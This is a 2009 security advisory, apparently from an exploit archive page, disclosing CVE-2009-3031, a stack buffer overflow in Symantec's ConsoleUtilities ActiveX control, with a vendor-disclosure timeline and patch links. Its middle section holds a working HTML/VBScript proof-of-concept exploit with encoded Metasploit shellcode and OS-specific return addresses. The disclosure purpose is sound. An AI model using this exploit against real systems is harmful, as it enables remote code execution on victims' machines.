what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Symantec ConsoleUtilities ActiveX Control Buffer Overflow

Symantec ConsoleUtilities ActiveX Control Buffer Overflow
Posted Nov 3, 2009
Authored by Nikolas Sotiriu | Site sotiriu.de

The Symantec ConsoleUtilities Active-X control suffers from a buffer overflow vulnerability.

tags | advisory, overflow, activex
advisories | CVE-2009-3031
SHA-256 | 5f09948f29db082ce2353ab83f2d2593b1645423033ffb0e75a67bbc53c8101f

Symantec ConsoleUtilities ActiveX Control Buffer Overflow

Change Mirror Download
_________________________________________
Security Advisory NSOADV-2009-001
_________________________________________
_________________________________________


Title: Symantec ConsoleUtilities ActiveX Control
Buffer Overflow
Severity: Critical
Advisory ID: NSOADV-2009-001
Found Date: 09.09.2009
Date Reported: 15.09.2009
Release Date: 02.11.2009
Author: Nikolas Sotiriu
Mail: nso-research at sotiriu.de
URL: http://sotiriu.de/adv/NSOADV-2009-001.txt
Vendor: Symantec (http://www.symantec.com/)
Affected Products: Symantec Altiris Notification Server 6.x
Symantec Management Platform 7.0.x
Symantec Altiris Deployment Solution 6.9.x
Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.1846
Not Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.2000
Remote Exploitable: Yes
Local Exploitable: No
CVE-ID: CVE-2009-3031
Patch Status: Vendor released an patch
Discovered by: Nikolas Sotiriu
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: For the permission to use his
Policy



Background:
===========

Altiris service-oriented management solutions provide a modular and
future-proof approach to managing highly diverse and widely distributed
IT infrastructures. They are open solutions that enable lifecycle
integration of client, handheld, server, network and other IT assets
with audit-ready security and automated operation.

(Product description from Symantec Website)



Description:
============

During the first access of the Management Website an ActiveX Control
will be installed (AeXNSConsoleUtilities.dll), in which the function
"BrowseAndSaveFile" is vulnerable to a stack based buffer overflow.

Name: ConsoleUtilities Class
Vendor: Altiris, Inc.
Type: ActiveX-Steuerelement
Version: 6.0.0.1846
GUID: {B44D252D-98FC-4D5C-948C-BE868392A004}
File: AeXNSConsoleUtilities.dll
Folder: C:\WINDOWS\system32



Proof of Concept :
==================

<html>
<title>NSOADV-2009-001</title>
<object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='obj'/>
</object>
<script language='vbscript'>

Sub Submit_OnClick

For i=0 to 2
If document.ret.os(i).checked Then
target=document.ret.os(i).value
End If
Next

EIP=unescape(target)
arg1 = ""
arg3 = ""
arg4 = ""
arg5 = ""

junk=String(310, "A") 'junk

morejunk=String(18, unescape("%u0041")) 'more junk

// windows/exec - 224 bytes
// http://www.metasploit.com
// Encoder: x86/call4_dword_xor
// EXITFUNC=seh, CMD=calc.exe
code=unescape("%uc92b%ue983%ue8ce%uffff%uffff%u5ec0%u7681%ue60e"&_
"%u2dad%u8338%ufcee%uf4e2%u451a%u38a4%uade6%ub14d"&_
"%u9c03%u5cff%uff6d%ub31d%ua1b4%u6aa6%u26f2%u105f"&_
"%u1ae9%u1e67%u52d7%uf81c%u914a%u444c%u81e4%uf90d"&_
"%ua029%uff2c%u5d04%u6f7f%uff6d%ub33d%u91a4%ue82c"&_
"%ued6d%ubd55%ud926%u3967%ufd36%u70a6%u26fe%u1875"&_
"%u7ee7%u04ce%u26af%ub319%u7be7%uc71c%u6dd7%uf981"&_
"%ua029%uff2c%u4dde%ucc58%ud0e5%u03d5%u899b%uda58"&_
"%u26be%u1c75%u7ee7%ub34b%ue6ea%u60a6%uacfa%ub3fe"&_
"%u26e2%ue82c%ue96f%u1c09%uf6bd%u614c%ufcbc%ud8d2"&_
"%uf2be%ub377%u46f4%u65ab%uac8c%ubda0%uad5f%u382d"&_
"%uc5b6%ub31c%u2a89%uedd2%u535d%u0a23%uc50c%uad8b"&_
"%u305b%uedd2%uabda%u3251%u5666%u4dcd%u16e3%u2b6a"&_
"%uc294%u3847%u52b5%u5bf8%uc187%u164e%ud583%u3848")

buf=junk+EIP+morejunk+break+code

obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5
End Sub
</script>

<h2>Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC</h2>
Use it only for education or ethical pentesting! The author accepts no
liability for damage caused by this tool.<br>Nikolas Sotiriu (lofi)
(http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009<br>

<h3>Some RET Infos:</h3>
Overwrite EIP with AAAA (crash)<br>
EIP=String(2, unescape("%u4141"))<br><br>

XP SP2 Ger shell32.dll JMP ESP<br>
EIP=unescape("%uaf0a%u77d5")<br><br>

XP SP3 Ger shell32.dll JMP ESP<br>
EIP=unescape("%u30D7%u7E68")<br><br>
----------------------------------------------------------------
<form name="ret">
<input type=radio name="os" value="%u4141%u4141">
DoS<br>
<input type=radio name="os" value="%uaf0a%u77d5">
Windows XP SP2 German<br>
<input type=radio name="os" value="%u30D7%u7E68">
Windows XP SP3 German<br>
<input type=button name="Submit" VALUE="Exploit">
</form>
<img src="http://sotiriu.de/images/logo_wh_80.png">
</html>



Solution:
=========

Symantec Security Advisory:
http://tinyurl.com/y9fakve

Hotfix (KB49568): Deployment Solution 6.9 SP3
https://kb.altiris.com/display/1n/articleDirect/index.asp?aid=49568

Hotfix (KB49389): Notification Server 6.x
Symantec Management Platform 7.x
https://kb.altiris.com/display/1n/articleDirect/index.asp?aid=49389



Disclosure Timeline (YYYY/MM/DD):
=================================

2009.09.09: Vulnerability found
2009.09.15: Sent PoC, Advisory, Disclosure policy and planned disclosure
date (2009.10.01) to Vendor
2009.09.15: Vendor response asking for resending the poc in a zipped and
password protected file (AV problem)
2009.09.15: Resending zipped and password protected
2009.09.17: Symantec Security Response Team verifies the vulnerability
2009.09.22: Symantec product team verifies the finding
2009.09.29: Ask for a status update, because the planned release date is
2009.10.01.
2009.09.29: Symantec Security Response Team tries to get a time line
from the product team.
2009.09.30: Changed release date to 2009.10.08 until a time line is
known
2009.10.07: Ask for a status update, because the planned release date is
2009.10.08.
2009.10.07: Symantec Security Response Team informs me if all goes well
they need one more week.
2009.10.07: Changed release date to 2009.10.15.
2009.10.14: Ask for a status update, because the planned release date is
2009.10.15.
2009.10.14: Symantec Security Response Team informs me that they have
an issue with an update and they need one more week.
2009.10.14: Changed release date to 2009.10.22.
2009.10.21: Ask for a status update, because the planned release date is
2009.10.22.
2009.10.21: Symantec Security Response Team informs me that they have
an issue with an update.
2009.10.21: Changed release date to 2009.10.29.
2009.10.28: Ask for a status update, because the planned release date is
2009.10.29.
2009.10.29: Symantec Security Response Team informs me that the patch
will be released on 2009.11.02 at 9am PST.
2009.11.02: Symantec Security Response Team informs me that the patch
and the Advisory is released.
2009.11.02: Release of this Advisory



Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close